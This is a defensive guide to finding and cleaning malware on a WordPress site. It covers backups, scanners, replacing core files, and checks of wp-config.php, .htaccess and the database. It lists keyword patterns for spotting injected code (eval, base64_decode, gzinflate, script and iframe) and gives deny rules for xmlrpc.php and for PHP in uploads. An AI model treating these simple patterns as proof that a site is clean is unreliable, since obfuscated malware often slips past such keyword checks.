How to Remove Malware from WordPress (Complete 2026 Guide)

WordPress Malware Removal Overview

WordPress malware is malicious code injected into your website without your permission.

If not handled properly, malware can:

• Redirect visitors to harmful websites
• Inject spam links into your content
• Create hidden access accounts
• Corrupt your sitemap
• Generate fake backlinks
• Increase server load
• Expose API credentials
• Get your site blacklisted by Google

This guide explains how to detect, remove, and prevent WordPress malware using practical, real-world steps.

What Is WordPress Malware?

WordPress malware is harmful code inserted into your website files or database.

This malicious code can:

• Redirect visitors to spam or scam websites
• Inject hidden spam links into your pages
• Steal customer data
• Create hidden admin users
• Generate unauthorized API tokens
• Create unknown FTP accounts
• Add unknown users to your Google Search Console accounts
• Change or corrupt your XML sitemaps
• Create backlinks to unknown or harmful websites (visible in Google Search Console)
• Modify important website files without your knowledge
• Send spam emails from your server
• Cause sudden spikes in fake or bot traffic
• Slow down your website
• Get your site blacklisted by Google

If any of these signs appear, your website should be treated as compromised.

Signs Your Website Is Infected

Common infection indicators include:

• Unknown admin users appearing in WordPress
• Unauthorized FTP accounts in hosting panel
• Newly created API tokens
• Unknown users added inside Google Search Console
• Corrupted or replaced sitemap files
• Sudden appearance of spam backlinks
• Pages redirecting to malicious domains
• Suspicious PHP files anywhere on the server — including /wp-content/uploads/, newly created directories in the root folder, or unexpected folders inside wp-admin (such as a maint folder)
• Repeated automated hits targeting login or admin URLs
• PHP backdoor files reappearing after deletion

If even one of these symptoms is present, immediate action is required.

What To Do Immediately (Before Cleaning)

Do not panic. Before making any changes, determine what access you still have to wp-admin, hosting panel, files, and database.

Step 1: Check Your Access

Confirm whether you can:

• Log in to wp-admin
• Access your hosting control panel (cPanel, Plesk, DirectAdmin, etc.)
• Use File Manager
• Access FTP
• Open phpMyAdmin

Your cleanup method depends on what access remains.

If wp-admin is locked but hosting panel works → cleanup is still possible.
If hosting panel is locked → contact your hosting provider immediately.

Step 2: Take a Full Backup

Before deleting anything, create a full backup.

If wp-admin works:

Install a backup plugin such as:

• All-in-One WP Migration
• UpdraftPlus
• WPvivid
• Backuply

Create:

• Full website files backup
• Full database backup

Download backup to your local system.

If wp-admin does NOT work:

From hosting panel:

• Download entire root directory (public_html)
• Export full database using phpMyAdmin
• Download .htaccess
• Download wp-config.php

Check Server-Level Backups

Many hosts provide:

• JetBackup
• Backuply (server-side version)
• Automatic restore points

If a clean restore point exists from before infection, restoration may be faster than manual cleanup.

Do not skip backup creation.

Step 1 – Scan Your Website for Malware

Use Hosting-Level Scanner First

Server-level scanners detect file infections beyond WordPress.

Common tools include:

• ImunifyAV / Imunify360
• ClamAV
• Linux Malware Detect (Maldet)
• ConfigServer eXploit Scanner (CXS)

Steps:

• Open hosting control panel
• Navigate to Security / Malware Scanner
• Run full account scan
• Note flagged file paths

Do not delete immediately.

Document everything first.

Scan Using WordPress Plugin (If wp-admin Works)

Use one scanner at a time.

Options:

• Wordfence (scan only; may be heavy on shared hosting)
• Sucuri Security
• MalCare

Important about MalCare:

• Free version detects infection
• It does not remove malware
• It may not display detailed file paths

Treat it as detection only unless using premium version.

Manual File Inspection

Check:

• /wp-content/uploads/ (should not contain executable PHP files)
• Root directory for unknown folders
• wp-admin for unexpected directories (e.g., maint)
• Recently modified files
• .htaccess
• wp-config.php

Look for:

• eval()
• base64_decode()
• gzinflate()
• Obfuscated code
• Long encoded strings

Step 2 – Remove Malicious Files Safely

Remove Backdoor Files

• Delete unknown PHP files
• Delete random alphanumeric filenames
• Delete fake plugin folders
• Delete suspicious new directories

If unsure, compare with clean WordPress install.

Replace WordPress Core Files

Download fresh WordPress from wordpress.org.

Extract locally.

Upload and replace:

• /wp-admin/
• /wp-includes/
• Root core files

Do NOT overwrite:

• /wp-content/
• wp-config.php

Inspect wp-config.php Carefully

Open wp-config.php.

Scroll to the bottom.

/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';

Be suspicious if you see:

• Code after the require_once line
• eval()
• base64_decode()
• Unknown include statements
• External domain calls

Compare with wp-config-sample.php from clean WordPress.

Remove only malicious code.

Do not remove database credentials or authentication keys.

Inspect .htaccess Carefully

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

Red flags:

• Encoded strings
• Redirects to unknown domains
• Conditional bot redirects

If unsure:

• Backup file
• Replace with default block
• Save permalinks in dashboard

Step 3 – Clean Malware from Database

Check wp_users

Remove unknown admin users.

Inspect wp_options

Check for:

• Suspicious URLs
• Injected scripts
• Modified homepage URLs
• Malicious cron entries

Search Entire Database

Search for:

<script>
iframe
base64
eval(

Suspicious domains

Remove injected content carefully.

Verify and Restore XML Sitemaps

Delete corrupted sitemap files from root.

Regenerate sitemap using:

• Yoast SEO
• Rank Math
• All in One SEO
• SEOPress

Re-submit in Google Search Console.

Remove unauthorized GSC users.

Protect or Disable XML-RPC

Visit:

yourdomain.com/xmlrpc.php

If active and not needed:

Block via .htaccess:

<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

Advanced users may delete the file, but blocking is safer.

Disable File Editing in Dashboard

Open wp-config.php.

above this line:

/* That's all, stop editing! Happy publishing. */

Insert:

define('DISALLOW_FILE_EDIT', true);

This removes theme and plugin file editors from wp-admin.

Restrict PHP Execution in Uploads

Navigate to:

public_html/wp-content/uploads/

Create or edit .htaccess inside uploads folder.

Add:

<Files *.php>
    deny from all
</Files>

This prevents execution of malicious scripts uploaded to that folder.

How to Prevent Future WordPress Malware

• Keep WordPress updated
• Keep plugins updated
• Do not use cracked or unknown GPL sources
• Limit admin access
• Enable 2FA
• Protect or disable XML-RPC
• Rotate API tokens if compromised
• Monitor server logs
• Maintain regular backups